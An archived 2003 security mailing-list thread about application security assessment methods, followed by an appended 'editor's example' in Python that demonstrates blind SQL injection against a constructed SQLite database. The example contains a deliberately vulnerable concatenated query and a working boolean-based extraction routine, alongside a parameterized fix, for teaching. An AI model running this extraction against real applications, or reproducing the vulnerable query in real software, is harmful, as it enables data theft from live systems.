WebApp Sec: RE: Application Security Assessment Methods

RE: Application Security Assessment Methods

From: Mehler, Robert <rmehler_at_bruteforcesecurity.com>
Date: Mon, 13 Oct 2003 08:26:00 -0400

Quite a good site. I would also recommend that people take a close look at www.webcohort.com.

The co-founder of Check Point (Shlomo Kramer) started this new application and database security software company, and his team has massive in-depth experience in application pen testing and has posted a few white papers on performing activities like blind SQL injection tests.

Robert J. Mehler
CIO

203-523-0474 x308 main
203-523-0479 fax
917-495-7030 cell
rmehler_at_bruteforcesecurity.com
http://www.bruteforcesecurity.com
 
This communication, including attachments, is for the exclusive use of
addressee and may contain proprietary, confidential or privileged
information. If you are not the intended recipient, any use, copying,
disclosure, dissemination or distribution is strictly prohibited. If you
are not the intended recipient, please notify the sender immediately by
return email and delete this communication and destroy all copies.

-----Original Message-----
From: Brian G. [mailto:brian_at_fireflydigitalmedia.com]
Sent: Sunday, October 12, 2003 8:30 PM
To: appsec_at_technicalinfo.net
Cc: webappsec_at_securityfocus.com; pen-test_at_securityfocus.com
Subject: Re: Application Security Assessment Methods

I just checked out www.technicalinfo.net. The site is full of great information, and I am convinced Mr. Gunter is quite an expert.
Thanks for the awesome contribution!
Brian

Quoting appsec_at_technicalinfo.net:

 Hi there,
 
 A lot of people appear to be asking for a detailed methodology on how to
 conduct a successful application security assessment. I have yet to find a
 good *public* methodology document that could be used for the diverse types of
 applications I come up against. To this end, I have written a brief paper to
 aid other consultants and security professionals to better assess the security
 of an application - without the overhead of a complex methodology.
 
 The paper can be found at
 http://www.technicalinfo.net/papers/AssessmentQuestions.html
 
 From the paper: "Application security assessment is a unique area of
 assessment and penetration testing. Unlike infrastructure based assessments,
 the methodology utilised by a security professional for identifying security
 vulnerabilities and significant issues is highly dependent upon the type of
 application being assessed. Instead of focusing on an all-encompassing
 application security assessment methodology, many consultants may find it more
 practical to cycle through a check-list of questions. The emphasis of the
 questions is not so much on how to test the application, but more as to what
 the consultant should be looking for."
 
 I hope someone out there also finds it useful to them.
 
 As this is the initial draft of the paper/questions, I would welcome replies
 to this email containing application based assessment questions that you feel
 are not covered in the present document and should be included in the next
 version.
 
 Cheers,
 
 Gunter
 
 
 Technical Info -- http://www.technicalinfo.net/
 

-- 
Brian G.
Firefly Digital Media
866-FFDIGTL
866-333-4485
Received on Oct 14 2003
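Editor's added example (not code from this thread, from the WebCohort white papers, or from Gunter's paper): the "blind SQL injection test" Mehler mentions, worked through against a constructed in-memory SQLite database. The application is assumed to answer only "user exists / does not exist" (the blind condition), so the tester infers a hidden value one character at a time from true/false answers. The table, sample rows, and the lookup_vulnerable/lookup_safe functions are constructed for the illustration; the parameterized version shows the same oracle yielding nothing.

```python
import sqlite3


def build_db():
    """Constructed sample backend (not real data): two users, one with a value worth leaking."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)")
    conn.execute("INSERT INTO users VALUES (1, 'admin', 's3cr3t')")
    conn.execute("INSERT INTO users VALUES (2, 'guest', 'guest')")
    return conn


def lookup_vulnerable(conn, username):
    """Deliberately vulnerable lookup: the username is concatenated into the SQL text.
    It returns only True/False, which is all a blind injection test needs."""
    sql = "SELECT id FROM users WHERE username = '" + username + "'"
    return conn.execute(sql).fetchone() is not None


def lookup_safe(conn, username):
    """Hardened lookup: the username is bound as a parameter, so it can never change the query."""
    sql = "SELECT id FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchone() is not None


def blind_extract(oracle, target_expr, max_len=32):
    """Boolean-based blind extraction.

    oracle(payload) -> bool is the application's yes/no answer for a submitted username.
    target_expr is a scalar SQL subquery (without outer parentheses) whose result we want.
    Returns the recovered string, or None if the oracle never confirms a length
    (which is what happens when the query is parameterized).
    """

    def ask(condition):
        # Known-good user 'admin' keeps the row matching; the injected AND clause
        # makes the match depend on our condition; the trailing '1'='1 closes the quote.
        return oracle("admin' AND (" + condition + ") AND '1'='1")

    length = None
    for n in range(0, max_len + 1):
        if ask(f"length(({target_expr})) = {n}"):
            length = n
            break
    if length is None:
        return None

    recovered = []
    for pos in range(1, length + 1):
        # Binary search over printable ASCII using SQLite's unicode() for the code point.
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if ask(f"unicode(substr(({target_expr}), {pos}, 1)) <= {mid}"):
                hi = mid
            else:
                lo = mid + 1
        recovered.append(chr(lo))
    return "".join(recovered)


def demo():
    """Run the same blind test against the vulnerable and the parameterized lookup."""
    conn = build_db()
    target = "SELECT password_hash FROM users WHERE id = 1"
    leaked = blind_extract(lambda p: lookup_vulnerable(conn, p), target)
    blocked = blind_extract(lambda p: lookup_safe(conn, p), target)
    return leaked, blocked


if __name__ == "__main__":
    leaked, blocked = demo()
    print("vulnerable lookup leaked:", leaked)
    print("parameterized lookup leaked:", blocked)
```

The test needs roughly 7 bits of queries per character plus the length probe, which is why a real assessment records the request count as well as the result: against the concatenated query the full value comes back, against the bound-parameter query the length probe never succeeds and the routine gives up.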